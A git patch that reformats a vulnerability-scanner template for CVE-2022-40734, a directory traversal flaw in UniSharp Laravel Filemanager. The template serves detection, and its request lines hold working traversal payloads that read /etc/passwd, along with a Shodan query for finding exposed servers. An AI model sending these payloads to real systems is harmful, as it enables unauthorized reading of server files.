From 4f7d31b4ec188eeb048ed513b5743d27f401428e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:24:40 +0530
Subject: [PATCH] Update CVE-2022-40734.yaml

---
 cves/2022/CVE-2022-40734.yaml | 18 ++++++++----------
 1 file changed, 8 insertions(+), 10 deletions(-)

diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml
index cd78a9bacf..4fae3434f1 100644
--- a/cves/2022/CVE-2022-40734.yaml
+++ b/cves/2022/CVE-2022-40734.yaml
@@ -1,18 +1,20 @@
 id: CVE-2022-40734
 
 info:
-  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal.  
+  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
   author: arafatansari
+  severity: high
   description: |
     UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
-  severity: high
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734
     - https://github.com/UniSharp/laravel-filemanager/issues/1150
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
+  classification:
+    cve-id: CVE-2022-40734
   metadata:
-    shodan-query: http.html:"Laravel Filemanager"
     verified: true
-  tags: traversal,unauthenticated,laravel,unisharp,cve,2022
+    shodan-query: http.html:"Laravel Filemanager"
+  tags: cve,cve2022,laravel,unisharp,lfi,traversal
 
 requests:
   - method: GET
@@ -20,12 +22,8 @@ requests:
       - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
       - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
 
-    matchers-condition: and
+    stop-at-first-match: true
     matchers:
       - type: regex
         regex:
           - "root:[x*]:0:0"
-
-      - type: status
-        status:
-          - 200